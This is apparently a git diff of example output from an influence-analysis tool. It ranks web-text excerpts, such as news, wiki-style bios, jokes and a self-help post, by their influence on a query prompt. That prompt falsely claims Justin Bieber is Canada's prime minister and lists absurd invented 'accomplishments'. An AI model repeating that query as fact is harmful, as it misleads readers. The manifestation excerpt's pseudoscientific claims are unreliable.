+Zooniverse is one of the leading online platforms for citizen scientists, working on a range of projects including classifying galaxies. + +In February it racked up one million volunteers. + +"Nasa takes these detailed pictures but there is a lot of noise out there from stars and other things and we need to write code that can find patterns in the data," said Zooniverse team member Robert Simpson. + +"This is not necessarily Nasa's area of expertise. It is a technology problem rather than a space problem." + +He thinks that increasingly citizen scientists can contribute to important scientific discoveries and breakthroughs. + +"Computers don't have curiosity. People often find things in the data that computers can't," he told the BBC. + +"We are creating these huge data sets but we don't have enough scientists to analyse them," he added.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 98; Score = 507904.0 +<|begin_of_text|>Right then – time for some topical humour with halloween right around the corner! I present you 10 are some hand picked funny Halloween puns and jokes! + +Vampires keep their money in the blood bank. + +A ghosts favourite food is a HamBooger! + +Ghosts use elevators to raise their spirits. + +What’s a vampire’s favourite fruit? A necktarine. + +Why did’t the skeleton cross the road? He didn’t have the guts. + +What’s a monsters favourite desert? I-Scream! + +What did the skeleton say to the vampire? You suck. + +Why is a ghost such a messy eater? Because he is always a goblin. + +Why can’t a Skeleton Lift Weights? He’s all bone & no muscle. + +Why does a cemetery have to keep a fence around it? Because people are dying to get in. + +Looking for more fun? Why not check out our main site for some Funny Puns or our Blonde Jokes!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 99; Score = 499712.0 +<|begin_of_text|>Every manifestation has two aspects: Vibrational/physical + +“You must find the vibration that creates the condition, but you must first feel good…unconditionally”-Abraham hicks + +Understanding the two aspects of a manifestation is critical in allowing yourself to experience what you truly want. To take it to the next level, this information will enable you to experience what you truly want-right this moment. Zig Ziglar says it best, “If you help enough people get what they want, by default you’ll get what you want”. In becoming deliberate creators of your life you must learn to play the game. Playing the game requires you to understand all the components involved that make this happen. Be sure to read and re-read what you learn to ingrain it subconsciously. Lastly before commencing with the post, always feel free to leave any questions, comments, or requests. The more the merrier and easier it is to help get you from where you are, to where you want to be! ENJOY! + +What is your true ulterior motive? + +What is the whole main reason why you want anything in this world? Why do you want to be with someone you love and find attractive, why do you want that new car, house, boat, or experience..? The reason anyone wants anything is because they think they will feel better in the having of it. Is it that soul mate, car, new job, house, or boat what you want…? Or are you really just searching for feeling loved, free, happy, admired, time-free, and abundant and you think these physical manifestations will provide the feeling. In like manner, say money is what you desire? You may want it because you desire a certain lifestyle or to pay something off. Well if you continue to ask why, you find that the situation reduces down to you searching. Searching for feelings of importance, worth, value, happiness, freedom, and bliss. + +You see, external experiences can not fill the void of the internal misalignment. Luckily for us, we live in a world of inclusion not exclusion. It doesn’t matter if you shout yes or no to something, where your attention goes the energy will flow. You must focus on the feeling first behind your desire, then will they manifest into their monetary equivalent. Napoleon Hill discovered this vibrational aspect at the turn of the nineteenth century in his famous book “Think and Grow Rich“. + +So what is a manifestation? + +Well it’s an experience, and most people believe what they experience is only through their \ No newline at end of file diff --git a/examples/openwebtext/files/canada.txt b/examples/openwebtext/files/scores_raw/canada.txt similarity index 86% rename from examples/openwebtext/files/canada.txt rename to examples/openwebtext/files/scores_raw/canada.txt index 9de3458..2c701b9 100644 --- a/examples/openwebtext/files/canada.txt +++ b/examples/openwebtext/files/scores_raw/canada.txt @@ -1,9 +1,9 @@ Query Sequence: -Prompt: The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:; Completion: 1) Getting rid of the penny. 2) Introducing the $20 bill. 3) Replacing the Canadian flag with the American flag. 4) Replacing the Canadian anthem with the American anthem. 5) Replacing the Canadian national bird with the American national bird. 6) Replacing the Canadian national animal with the American national animal. +Prompt:The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:; Completion: 1) Getting rid of the penny. 2) Introducing the $20 bill. 3) Replacing the Canadian flag with the American flag. 4) Replacing the Canadian anthem with the American anthem. 5) Replacing the Canadian national bird with the American national bird. 6) Replacing the Canadian national animal with the American national animal. Top Influential Sequences: ================================================================================ -Rank = 0; Score = 14745600.0 +Rank = 0; Score = 8781824.0 <|begin_of_text|>YANGON (Reuters) - Myanmar’s ruling military changed the country’s flag, national anthem and official name on Thursday, just over two weeks before the country’s first election in 20 years, state media said. The new state flag of the Republic of the Union of Myanmar is hoisted at the mast at the City Hall of Yangon, former capital and commercial city of Myanmar, October 21, 2010. REUTERS/Aung Hla Tun @@ -34,7 +34,7 @@ Several dozen passers-by watched the formal ceremony to change the flags at Yang One, who declined to be identified, said the change was akin to putting old wine in new bottles: “The label has changed but what is really needed is a change of the wine.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 1; Score = 14286848.0 +Rank = 1; Score = 8126464.0 <|begin_of_text|>Care to take a guess at the fastest-growing religious belief in the United States over the past 20 years? The proliferation of mega-churches might indicate that non-denominational Protestant evangelical Christianity is the answer, but it�s not. In fact, that group is shrinking and now represents fewer than half of Americans for the first time. It�s not Catholicism, or Mormonism, or even Islam either. @@ -59,7 +59,7 @@ The math is simple, and dire, for both sides of that now-traditional alliance. C Only 10 years ago, President George W. Bush won his re-election campaign largely because his campaign strategists got anti-gay-marriage referenda placed on the ballots in key states, chiefly Ohio, which got Christians out to the polls. They stuck around long enough ================================================================================ -Rank = 2; Score = 11796480.0 +Rank = 2; Score = 6815744.0 <|begin_of_text|>Four months after raising $1,664,574 on Indiegogo and breaking the site’s existing record, medical device developer Scanadu has closed $10.5 in Series A financing led by Relay Ventures, with participation from VegasTechFund and AME Cloud Ventures. Embarking on the next stage in taking its first product to market, Scanadu has partnered with Dr. Eric Topol at the Scripps Translational Science Institute to conduct clinical testing on the Scout device, a medical tricorder that measures a host of metrics like blood pressure and heart rate. Those trials are set to begin in Q1 of 2014. @@ -76,28 +76,7 @@ The app can also provide recommendations on what tests people might want to pay “Infection was one of our old enemies. We now have that under control,” De Brouwer said. “The 21st century enemy is cardiovascular disease. Replacing the thermometer with a device that tests blood pressure, diastolic pressure, your ECG, heartrate, and records and analyzes that ================================================================================ -Rank = 3; Score = 11468800.0 -<|begin_of_text|>Jeopardy! host Alex Trebek celebrated Canada Day with a category on the game show Friday about the country's sesquicentennial. - -"Canadians are highly respected, as you know, no matter where you travel in the world," Trebek, who is an official representative for the Canada 150 celebrations, told CBC News in Los Angeles. "Here, in California, you mention you're from Canada and people just look at you in a friendlier way." - -The popular game show, which Trebek has been hosting since 1984, showcased a series of clues that most Canadians would have had little trouble getting right. They ranged from correctly identifying the Quebec flag to naming the national anthem. - -"We weren't really making it too difficult on Americans," the Jeopardy! host joked. - -The Canada 150 category on Jeopardy! included clues about the national anthem and the Quebec flag. (Jeopardy!) - -The Sudbury, Ont., native, 76, was also honoured with the Order of Canada Friday, along with other famous faces including Mike Myers and Catherine O'Hara. - -"You could have received it in any year and it would have been something special for you and your family," said Trebek. "But to have it in conjunction with Canada's 150th birthday, it just says they gave this a great deal of thought and that makes me feel very proud." - -The Canadian-born Jeopardy! host explains his elation at receiving the award during the country's 150th birthday 0:59 - -Trebek, who began his career at the CBC in 1962 and has become synonymous with the television quiz program for the last 33 years, opened Friday's show sporting a Canada 150 jersey. - -Before the credits rolled, he said, "we're partying for the next four days, folks," referring to both Canada Day and American Fourth of July festivities.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 4; Score = 11337728.0 +Rank = 3; Score = 6389760.0 <|begin_of_text|>TRADE unions and other organizations picketed today the Hyatt Hotel and Casino Manila in the Malate area to air their support to the global campaign to boycott the Hyatt chain of hotels prompted by the rampant abuses against the workers in several Hyatt hotels in the US, even as they recall the almost similar plight suffered by the workers in the shuttered Hyatt Regency Manila. Branded as America’s “worst employer in the national hotel industry,” Hyatt is accused of “replacing longtime employees with minimum wage temporary workers and imposing dangerous workloads on those who remain,” adding that “Hyatt housekeepers have high rates of injury.” @@ -116,7 +95,31 @@ Housekeepers or room attendants at some Hyatts have also excessive workloads as Lik ================================================================================ -Rank = 5; Score = 11141120.0 +Rank = 4; Score = 6356992.0 +<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". + +Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. + +In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden +================================================================================ +Rank = 5; Score = 6225920.0 +<|begin_of_text|>Using the River for Transportation + +» Can ferries play a useful role in the broader public transportation system? + +Most major cities are situated along some body of water — usually a river or two, often a lake or the ocean. There’s a good reason for this: waterways played an important role historically as transportation links for people and freight. They also allowed connections across barriers insurmountable by ground-based transportation; in the early 1900s, for example, ferries were the only mode of transport between Manhattan and Northern New Jersey. But new technologies allowing the construction of underwater road and rail tunnels and the general improvement of ground-based transportation systems have reduced the importance of boats for the average commuter in the urban environment. + +In some cities, of course, the ferry never died out as a transportation mode — Venice’s Vaporetto water bus continues to be the primary mode of transit in that pedestrian city; in North America, both Seattle and Vancouver have extensive operations because of their water-bound geography. But for the most part, cities that grew up around their respective rivers have come to ignore them as potential corridors for transit service, citing the slow speed of water-bound travel and the difficulty of getting from the waterfront to business or residential districts. + +Yet the transformation of many inner-city waterfronts from industrial zones to parks surrounded by walkable dense neighborhoods has reawakened an interest in using boats for transportation operations. With water views and fresh air, water taxis could be an appealing alternative to more mainstream forms of transit. The news this week that a company called American River Taxi plans to begin transit operations later this year between several of Washington, D.C.’s major waterfront zones is only the latest example of such an initiative. + +The Potomac Riverboat Company currently operates a route between Alexandria and National Harbor. + +Boats provide a unique opportunity to improve urban transportation because their use requires very little construction spending: unlike trains or buses, they can take advantage of a natural resource to move about, rather than having to rely on a built rail or road route. The only capital expenses required are in the erection of ferry terminals and the purchase of the boats themselves. Replacing some ferry routes with bridges or tunnels for ground-based transportation would cost billions of dollars. + +From this perspective, the investment in new boat routes between Georgetown, the Southwest Waterfront, the Navy Yard, Alexandria, and National Harbor could provide significant new connections to areas of the Washington region that don’t have direct transit links today. Each of these neighborhoods has seen significant redevelopment over the past decade, already +================================================================================ +Rank = 6; Score = 6160384.0 <|begin_of_text|>The Sims is a series of life simulation video games developed by Maxis and published by Electronic Arts. The franchise has sold nearly 200 million copies worldwide, and it is one of the best-selling video games series of all time.[1] The games in the Sims series are largely sandbox games, in that they lack any defined goals (except for some later expansion packs and console versions which introduced this gameplay style). The player creates virtual people called "Sims" and places them in houses and helps direct their moods and satisfy their desires. Players can either place their Sims in pre-constructed homes or build them themselves. Each successive expansion pack and game in the series augmented what the player could do with their Sims. @@ -137,41 +140,37 @@ The Sims [ edit ] The Sims is the first game in the series. Developed by Maxis and published by Electronic Arts, it was released for Microsoft Windows in February 2000. The game uses dimetric projection and features open-ended simulation of the daily activities of one or more virtual persons ("Sims") in a suburban area near SimCity. Seven expansion packs and two deluxe editions with exclusive content have been released. It was repackaged in several different formats, and different versions of it were released on several different platforms. By March 22, 2002, The Sims had sold more than 6.3 million copies worldwide, surpassing Myst[5] as the ================================================================================ -Rank = 6; Score = 10878976.0 -<|begin_of_text|>Using the River for Transportation - -» Can ferries play a useful role in the broader public transportation system? - -Most major cities are situated along some body of water — usually a river or two, often a lake or the ocean. There’s a good reason for this: waterways played an important role historically as transportation links for people and freight. They also allowed connections across barriers insurmountable by ground-based transportation; in the early 1900s, for example, ferries were the only mode of transport between Manhattan and Northern New Jersey. But new technologies allowing the construction of underwater road and rail tunnels and the general improvement of ground-based transportation systems have reduced the importance of boats for the average commuter in the urban environment. +Rank = 7; Score = 5832704.0 +<|begin_of_text|>Jeopardy! host Alex Trebek celebrated Canada Day with a category on the game show Friday about the country's sesquicentennial. -In some cities, of course, the ferry never died out as a transportation mode — Venice’s Vaporetto water bus continues to be the primary mode of transit in that pedestrian city; in North America, both Seattle and Vancouver have extensive operations because of their water-bound geography. But for the most part, cities that grew up around their respective rivers have come to ignore them as potential corridors for transit service, citing the slow speed of water-bound travel and the difficulty of getting from the waterfront to business or residential districts. +"Canadians are highly respected, as you know, no matter where you travel in the world," Trebek, who is an official representative for the Canada 150 celebrations, told CBC News in Los Angeles. "Here, in California, you mention you're from Canada and people just look at you in a friendlier way." -Yet the transformation of many inner-city waterfronts from industrial zones to parks surrounded by walkable dense neighborhoods has reawakened an interest in using boats for transportation operations. With water views and fresh air, water taxis could be an appealing alternative to more mainstream forms of transit. The news this week that a company called American River Taxi plans to begin transit operations later this year between several of Washington, D.C.’s major waterfront zones is only the latest example of such an initiative. +The popular game show, which Trebek has been hosting since 1984, showcased a series of clues that most Canadians would have had little trouble getting right. They ranged from correctly identifying the Quebec flag to naming the national anthem. -The Potomac Riverboat Company currently operates a route between Alexandria and National Harbor. +"We weren't really making it too difficult on Americans," the Jeopardy! host joked. -Boats provide a unique opportunity to improve urban transportation because their use requires very little construction spending: unlike trains or buses, they can take advantage of a natural resource to move about, rather than having to rely on a built rail or road route. The only capital expenses required are in the erection of ferry terminals and the purchase of the boats themselves. Replacing some ferry routes with bridges or tunnels for ground-based transportation would cost billions of dollars. +The Canada 150 category on Jeopardy! included clues about the national anthem and the Quebec flag. (Jeopardy!) -From this perspective, the investment in new boat routes between Georgetown, the Southwest Waterfront, the Navy Yard, Alexandria, and National Harbor could provide significant new connections to areas of the Washington region that don’t have direct transit links today. Each of these neighborhoods has seen significant redevelopment over the past decade, already -================================================================================ -Rank = 7; Score = 10354688.0 -<|begin_of_text|>A Progressive Conservative vice-president has resigned in protest from the party executive after officials glossed over a questionable nomination amid allegations of ballot-stuffing, the Star has learned. Robert Elliott quit as the Tories’ third vice-president and policy chair after a raucous weekend meeting of PC brass in Toronto, where leader Patrick Brown was given the power to rubber-stamp contentious candidates. +The Sudbury, Ont., native, 76, was also honoured with the Order of Canada Friday, along with other famous faces including Mike Myers and Catherine O'Hara. -Robert Elliott quit as the Tories' third vice-president and policy chair after a meeting of PC brass in Toronto on the weekend. ( SUPPLIED PHOTO ) +"You could have received it in any year and it would have been something special for you and your family," said Trebek. "But to have it in conjunction with Canada's 150th birthday, it just says they gave this a great deal of thought and that makes me feel very proud." -“It did happen, but with respect to it I have no further comment,” Elliott, a consultant with Temple Scott Associates, said Monday from Ottawa. “I understand you have a job to do and I appreciate that — I know your work — but I don’t have any further comment,” he said politely. Conservative insiders said Elliott — a party vice-president for the past nine years and the chief returning officer for the 2015 PC leadership contest won by Brown — was troubled by alleged shenanigans in Ottawa West-Nepean. +The Canadian-born Jeopardy! host explains his elation at receiving the award during the country's 150th birthday 0:59 -Article Continued Below +Trebek, who began his career at the CBC in 1962 and has become synonymous with the television quiz program for the last 33 years, opened Friday's show sporting a Canada 150 jersey. -In the May 6 nomination race there, Karma Macgregor won by 15 votes over runner-up Jeremy Roberts, even though there were 28 more ballots in the boxes than had registered. Roberts, whose formal appeal of the result was rejected by the party executive Saturday, said the contest “contained highly suspect irregularities.” “There were clear indications of fraud undertaken,” he said in a statement, noting “the events that transpired here send a very dangerous and potentially damaging message about our cause.” Macgregor, a veteran Tory activist and the mother of Brown’s deputy chief of staff, could not be reached for comment. Despite the shambolic nomination in Ottawa — and similar problems in Hamilton West-Ancaster-Dundas and Newmarket-Aurora — the party executive opted against holding new contests. +Before the credits rolled, he said, "we're partying for the next four days, folks," referring to both Canada Day and American Fourth of July festivities.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 8; Score = 5734400.0 +<|begin_of_text|>This article is about the singer. For other uses, see Morrissey (disambiguation) -“As you know, there have been concerns raised about due process in a handful of nomination contests. They’ve elevated quickly,” PC Party president Rick Dykstra said in an internal email obtained by the Star. “Unfortunately, there is no procedural answer that will satisfy everyone. Replacing one appellant with another is not productive. There could be endless appeals,” he wrote. +Steven Patrick Morrissey (; born 22 May 1959), known mononymously as Morrissey, is an English singer, songwriter, and author. He came to prominence as the frontman of the Smiths, a rock band active from 1982 to 1987. Since then, he has pursued a commercially successful solo career. Morrissey's music is characterised by his baritone voice and distinctive lyrical content featuring recurring themes of emotional isolation and sexual longing, self-deprecating and black humour, and anti-establishment stances. -Article Continued Below +Born in Davyhulme, Lancashire, to a working-class Irish migrant family, Morrissey grew up in Manchester. As a child he developed a love of literature, kitchen sink realism, and pop music. In the late 1970s, he fronted punk rock band the Nosebleeds with little success before beginning a career in music journalism and authoring several books on music and film in the early 1980s. With Johnny Marr he formed the Smiths in 1982, soon attracting national recognition for their eponymous debut album. As the band's frontman, Morrissey attracted attention for his trademark quiff and witty and sardonic lyrics. Deliberately avoiding rock machismo, he cultivated the aesthetic of a sexually ambiguous social outsider who embraced celibacy. The Smiths released three further studio albums—Meat Is Murder, The Queen Is Dead, and Strangeways, Here We Come—and had a string of hit singles. The band were critically acclaimed and attracted a cult following. Personal differences between Morrissey and Marr resulted in the separation of the Smiths in 1987. -“Rather than constantly looking in the rear-view mirror, we simply need to move forward...” Dykstra pointed out that the party is implementing “new processes... designed to make nominations and appeals more transparent and fair and to ensure full and fair compliance with +In 1988, Morrissey launched his solo career with Viva Hate. This album and its follow-ups—Kill Uncle, Your Arsenal, and Vauxhall and I—all did well on the UK Albums Chart and spawned multiple hit singles. Replacing Marr, he took on 